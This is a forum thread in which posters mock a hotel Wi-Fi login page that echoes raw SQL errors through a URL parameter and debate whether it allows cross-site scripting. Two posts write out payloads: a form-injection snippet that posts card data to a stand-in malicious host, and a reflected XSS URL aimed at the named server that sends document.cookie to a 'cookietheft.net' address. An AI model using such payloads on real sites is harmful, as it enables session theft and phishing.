SQL "Injection" WTF



  • I just checked into a Holiday Inn in Los Angeles.. and connected to their free wi-fi network. Of course, it loads an authentication page (We were given a logon and password). Maybe it's because I use Opera and not IE, or just maybe they had a database hiccup.. but this is the error page I received (super long URL follows):



    http://ethoserver.ezone.net/message.php?mess=An error occured durring processing. Please call support.<BR>Lost connection to MySQL server during query<BR>SQL: select count(*) from LoginsActive where MacAddress='00:90:96:AC:8C:D8' and MacAddress!=''%20and%20Iface='br0'%20and%20PropertyID='16'%20%3CBR%3E%3CBR%3EIP:sql.ethostream.com%3CBR%3EDBU:remote%3CBR%3EDB:



    Plenty of WTFs to enjoy there. Too bad they didn't include the login ID and password.



    -Hank



  •  i got a 404



  •  Granted, that is a horrible way to compose a message and they should really be logging this error internally and rather present you with a generic message so when you call support they can look in their log file. But they're not really giving away any information you wouldn't already know or could guess.

    And you can't do anything with the MySQL server name or table name unless they also misconfigured the server to allow remote access over IP.

     



  • @Dalden said:

    Granted, that is a horrible way to compose a message and they should really be logging this error internally and rather present you with a generic message so when you call support they can look in their log file. But they're not really giving away any information you wouldn't already know or could guess.

    And you can't do anything with the MySQL server name or table name unless they also misconfigured the server to allow remote access over IP.

    Guess you've never heard of XSS then. 



  •  @morbiuswilters said:

    Guess you've never heard of XSS then. 

     I have, if you mean cross site scripting? Do you propose tricking someone with local access to the server into running malicious code with the local user's privileges?



  • @Dalden said:

    I have, if you mean cross site scripting? Do you propose tricking someone with local access to the server into running malicious code with the local user's privileges?

    I mean giving a user a URL formed so that code is injected into the error page.  I'm not sure if that's what you are saying, but it's certainly a security hole.



  • The requested URL /message.php was not found on this server.



  • @morbiuswilters said:

    @Dalden said:

    I have, if you mean cross site scripting? Do you propose tricking someone with local access to the server into running malicious code with the local user's privileges?

    I mean giving a user a URL formed so that code is injected into the error page.  I'm not sure if that's what you are saying, but it's certainly a security hole.

    I've seen some apps using this "method" for error messages. At least one financial institution had something like this:

    http://wtfbank.com/SomeCrappyApp/error_message.jsp?error=The%20desktop%20environment%20could%20not%20be%20loaded.%20Please%20contact%20your%20administrator.

    We took some time ago a snapshot of that error "page", with another message akin to User%20too%20stupid%20to%20use%20computer and sometimes used said URL in testing environments. We were trying to show how bad an idea it was to display error messages like this, but no one cared.



  • Apparently you need to be connected to their network to see the error:



    Here's a screen print:




    <img src=http://forums.wheresgeorge.com/attachment.php?attachmentid=2894&stc=1&d=1215617217>





  • @morbiuswilters said:

    I mean giving a user a URL formed so that code is injected into the error page.  I'm not sure if that's what you are saying, but it's certainly a security hole.

    A very minor one in this case though, I think. From what I can see, the site uses neither cookies nor a login on that host. In fact, the message.php thing seems to have been the only dynamic page there.

    So until we get cross domain XMLHTTP, I don't think you could do more harm than the mandatory 'while(1)alert("lulz, I'm in ur browser getting on ur nerves");' message loop.

    [EDIT]

    Okay, I'm connecting from outside, so maybe I don't see some things there.



  • @danixdefcon5 said:

    Try this: http://ethoserver.ezone.net/message.php?mess=EPIC%20FAIL!!!!!

    That works!! (for me, currently on their network)



  • @PSWorx said:

    So until we get cross domain XMLHTTP, I don't think you could do more harm than the mandatory 'while(1)alert("lulz, I'm in ur browser getting on ur nerves");' message loop.

    Those already exist; they're called iframes. :) The bigger problem here though is probably from a social engineering standpoint, where one may be able to inject a form like <form method="post" action="http://malicioussite.com/stealstuff"><p>Enter your username and password/credit card information/mother's maiden name to continue</p><input type="text" name="ccnum" /> ...</form> etc etc.



  • Unless I'm mistaken, aren't they simply passing the error message to display as a URL parameter?  Printing the invalid query to the user isn't the smartest thing in the world, but I'm not sure this page is vunerable to SQL injection...  And yes, this is a horrible way of passing error messages.  I think i did something like it once, before I learned about session variables and cookies.



  • @PSWorx said:

    So until we get cross domain XMLHTTP, I don't think you could do more harm than the mandatory 'while(1)alert("lulz, I'm in ur browser getting on ur nerves");' message loop.

     

    What about

    <samp>http://ethoserver.ezone.net/message.php?mess=%3Cscript%3Ewindow.location%20%3D%20%22http%3A//cookietheft.net/steal%3F%22%20%2B%20document.cookie%3C/script%3E</samp>



  • @bighusker said:

    I think i did something like it once, before I learned about session variables and cookies.

    Error messages in session variables and cookies?  WTF? 



  • @morbiuswilters said:

    Error messages in session variables and cookies?  WTF? 

     <hints id="hah_hints"></hints>
    In some convoluted Ajax apps, you might see errors (as well as just about everything else) funneled through the session state.  Not that this is common, and most of the time there's a better way, but it's not totally inconceivable.

    Cookies I can't even guess... 



  • I wasn't referring to passing error messages through sesion variables and cookies.  I was simply referring to passing data around between pages.  5-6 years ago, I would often just keep passing crap through a query_string if it had to cycle through multiple different pages...which meant any time you wanted an extra piece of data to get passed, you had to modify how the query string is built on each page.  And yea...I've never used cookies for anything like that.  I think I was a bit hurried when I typed it.

     

    I can't think of any practical reason for passing specific error messages through a URL parameter....that's a whole other problem. 



  • @bighusker said:

    I can't think of any practical reason for passing specific error messages through a URL parameter....that's a whole other problem. 

    I have something to confess, I actually thought about doing that once.  I was thinking about how to optimize a site that was already mostly static pages and I thought about having a generic, static "message" page that had the actual message written out by Javascript.  Of course, it would have been properly escaped, but that's still a bit of a WTF.



  • @bighusker said:

    but I'm not sure this page is vunerable to SQL injection...



    That's why I put "injection" in quotes. It's injecting SQL into the error message page, not the database.


Log in to reply